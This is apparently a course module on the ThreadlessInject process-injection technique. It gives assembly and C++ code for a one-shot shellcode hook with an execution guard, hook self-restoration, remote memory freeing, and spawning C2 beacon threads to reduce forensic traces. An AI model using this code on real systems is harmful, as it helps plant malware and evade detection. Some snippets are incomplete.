Module 7: Shellcode Execution & Cleanup
One-shot execution: run the payload once, then restore the hook and vanish.
The One-Shot Problem
ThreadlessInject is designed as a one-shot injection mechanism. The hook should fire once, execute the shellcode payload, and then clean itself up so the hooked function returns to normal. If the hook stays active, the shellcode runs every time the function is called, which creates problems: repeated execution of initialization shellcode (like a Cobalt Strike stager) will crash or behave incorrectly, the added latency on every call degrades performance, and the persistent hook is a detection artifact.
Why One-Shot Matters
Most shellcode payloads (stagers, loaders, implant bootstraps) are designed to run exactly once. They perform initialization, spawn their own thread for the C2 communication loop, and return. If the hook stub calls the shellcode every time the hooked function is called, you get multiple initializations, multiple C2 connections, and likely crashes from double-initialization of global state.
| Scenario | Persistent Hook | One-Shot Hook |
|---|---|---|
| Shellcode execution count | Every call to hooked function | Exactly once |
| C2 connections | Multiple (one per trigger) | Single |
| Process stability | Degrades over time | Returns to normal |
| Detection window | Permanent hook artifact | Brief, then clean |
| Performance impact | Continuous overhead | One-time delay |
The Execution Guard: Preventing Re-Execution
There are several approaches to ensuring one-shot execution. The actual ThreadlessInject tool uses self-restoration: the loader stub writes the original function bytes back over the hook before calling the shellcode, so the hook is removed on first trigger and subsequent calls go straight to the original function. The injector process then polls the hooked function's bytes (via NtReadVirtualMemory) for up to 60 seconds to detect when the original bytes have been restored, confirming execution occurred.
An alternative approach (shown below for educational purposes) uses an execution guard flag stored in the allocated memory region. The hook stub checks this flag before calling the shellcode. On the first execution, the flag is clear, so the shellcode runs. The stub then sets the flag, and all subsequent invocations skip the shellcode call.
x86-64 ASM; Modified hook stub with execution guard
hook_stub:
; Check the execution guard (a DWORD at a known offset in our memory region)
; The guard is initialized to 0 by the injector
lea rax, [rip + guard_offset] ; Load address of guard variable
lock cmpxchg [rax], ecx ; Atomically check and set
; Alternative simpler approach:
mov eax, [rip + guard_offset] ; Read guard flag
test eax, eax ; Is it zero?
jnz skip_shellcode ; If non-zero, skip shellcode (already executed)
; Set the guard to 1 (prevent future executions)
mov dword ptr [rip + guard_offset], 1
; Save registers (same as Module 5)
push rax
push rcx
; ... (all registers saved)
pushfq
; Align stack and call shellcode
mov rbp, rsp
and rsp, 0xFFFFFFF0
sub rsp, 0x20
mov rax, shellcode_addr
call rax
; Restore registers
mov rsp, rbp
popfq
; ... (all registers restored)
pop rax
skip_shellcode:
; Execute original bytes (always, regardless of guard)
; [14 bytes of saved original prologue]
; Jump back to hooked function + 14
jmp [rip + 0]
dq original_func_plus_14
guard_offset:
dd 0 ; Initialized to 0, set to 1 after first execution
Atomic Guard with LOCK CMPXCHG
For true thread safety, the guard check should be atomic. Multiple threads might call the hooked function simultaneously, and we need to guarantee that only one thread executes the shellcode. The LOCK CMPXCHG instruction performs an atomic compare-and-swap: it checks if the guard is 0, and if so, sets it to 1 in a single atomic operation. Only the thread that successfully changes the guard from 0 to 1 proceeds to execute the shellcode; all other threads see the guard is already 1 and skip.
Self-Restoration: Unhooking After Execution
The most thorough cleanup approach is to restore the original function bytes after the shellcode executes. This removes the hook entirely, so the function returns to its original unmodified state. There are two ways to accomplish this:
Approach 1: Shellcode Restores the Hook
The shellcode itself can restore the original bytes. ThreadlessInject passes the necessary information (original function address, original bytes, byte count) to the shellcode, which uses NtProtectVirtualMemory and memcpy to restore the prologue:
C++// Shellcode-side restoration (running inside the target process)
// The shellcode has been given pointers to the original bytes and target address
void ShellcodeEntry(RESTORATION_INFO* info) {
// Step 1: Do the actual payload work (e.g., spawn beacon)
LoadAndExecutePayload();
// Step 2: Restore the hooked function's original bytes
ULONG oldProtect = 0;
PVOID addr = info->hookedFuncAddr;
SIZE_T size = 14;
// Make the code page writable again
NtProtectVirtualMemory(
GetCurrentProcess(), &addr, &size,
PAGE_EXECUTE_READWRITE, &oldProtect
);
// Copy original bytes back over the hook JMP
memcpy(info->hookedFuncAddr, info->originalBytes, 14);
// Restore original protection
NtProtectVirtualMemory(
GetCurrentProcess(), &addr, &size,
oldProtect, &oldProtect
);
}
Approach 2: Injector Monitors and Restores
Alternatively, the injector process can monitor for a signal that the shellcode has executed (e.g., by checking the guard flag in remote memory via NtReadVirtualMemory), then restore the original bytes from the injector side:
C++// Injector-side restoration (running in the attacker's process)
// Poll the guard flag until shellcode has executed
printf("[*] Waiting for shellcode execution...\n");
DWORD guard = 0;
while (guard == 0) {
NtReadVirtualMemory(hProcess, guardFlagAddr, &guard, sizeof(guard), NULL);
Sleep(100); // Check every 100ms
}
printf("[+] Shellcode executed! Restoring original bytes...\n");
// Restore the original function prologue
PVOID protAddr = (PVOID)hookedFuncAddr;
SIZE_T protSize = 14;
ULONG oldProt = 0;
NtProtectVirtualMemory(hProcess, &protAddr, &protSize,
PAGE_EXECUTE_READWRITE, &oldProt);
NtWriteVirtualMemory(hProcess, (PVOID)hookedFuncAddr,
originalBytes, 14, NULL);
NtProtectVirtualMemory(hProcess, &protAddr, &protSize,
oldProt, &oldProt);
printf("[+] Hook removed, original function restored.\n");
One-Shot Execution Timeline
Memory Cleanup
After the hook is removed and the original function is restored, the allocated memory region (containing the hook stub and shellcode) remains in the target process. For a simple stager that spawns its own long-running thread, this is acceptable — the stager code is no longer needed, but freeing it while the spawned thread might still reference it could cause issues.
For a thorough cleanup, you can optionally free the memory:
C++// Optional: Free the hook stub + shellcode memory
// Only safe if shellcode has fully bootstrapped and no longer needs the region
PVOID freeAddr = remoteBase;
SIZE_T freeSize = 0; // 0 means release the entire region
NtFreeVirtualMemory(
hProcess,
&freeAddr,
&freeSize,
MEM_RELEASE
);
// The remote memory region is now freed
// Warning: only do this if the shellcode has completed bootstrapping
Cleanup Trade-offs
Freeing the remote memory is ideal for stealth but risky for stability. If the shellcode allocated any structures that point back into the hook region, or if the shellcode spawned a thread that occasionally references it, freeing the memory causes a use-after-free crash. In practice, many operators leave the memory allocated (it is small, typically a few kilobytes) and accept the minor forensic artifact. The hook stub memory in RX protection without a backing image file is itself a detection vector, but it is less conspicuous than an active hook on a function prologue.
Handling Shellcode That Blocks
Some shellcode payloads block (run for a long time or indefinitely) rather than quickly spawning a thread and returning. If your shellcode blocks, the thread that triggered the hook is stuck in the shellcode and never returns to the hooked function. This means:
- The thread that triggered the hook is hijacked permanently (or until the shellcode exits).
- The hooked function is effectively unavailable for that thread, potentially breaking the target application.
- The hook is never restored (if relying on the shellcode to restore it).
For this reason, well-designed shellcode for threadless injection should follow the pattern: spawn a new thread (or work item) for the long-running C2 loop, then return control to the hook stub immediately. This way, the hijacked thread resumes its normal operation within milliseconds.
C++// Good shellcode pattern for threadless injection:
// Spawn a worker thread for the long-running payload, then return quickly
void ShellcodeEntry() {
// Quickly bootstrap: resolve CreateThread, allocate implant memory, etc.
pCreateThread CreateThread = ResolveAPI("kernel32.dll", "CreateThread");
// Spawn the long-running C2 loop on a new thread
CreateThread(NULL, 0, BeaconMainLoop, NULL, 0, NULL);
// Return immediately so the hook stub can restore registers
// and resume the hooked function
return;
}
// Total time on the hijacked thread: ~1ms for the bootstrap
The Clean State After Execution
When the one-shot pattern works correctly, the end state is remarkably clean: the shellcode has spawned its implant on a new thread (which looks like any other thread to the OS), the hooked function has been restored to its original bytes, and the only remaining artifact is the allocated memory region containing the now-inactive hook stub. Compare this to traditional injection where a thread exists whose start address points to VirtualAllocEx'd memory — ThreadlessInject's forensic footprint is substantially smaller.
Pop Quiz: Execution & Cleanup
Q1: Why is one-shot execution important for ThreadlessInject?
Q2: How does LOCK CMPXCHG help with the execution guard?
Q3: Why should shellcode for threadless injection spawn a new thread and return quickly?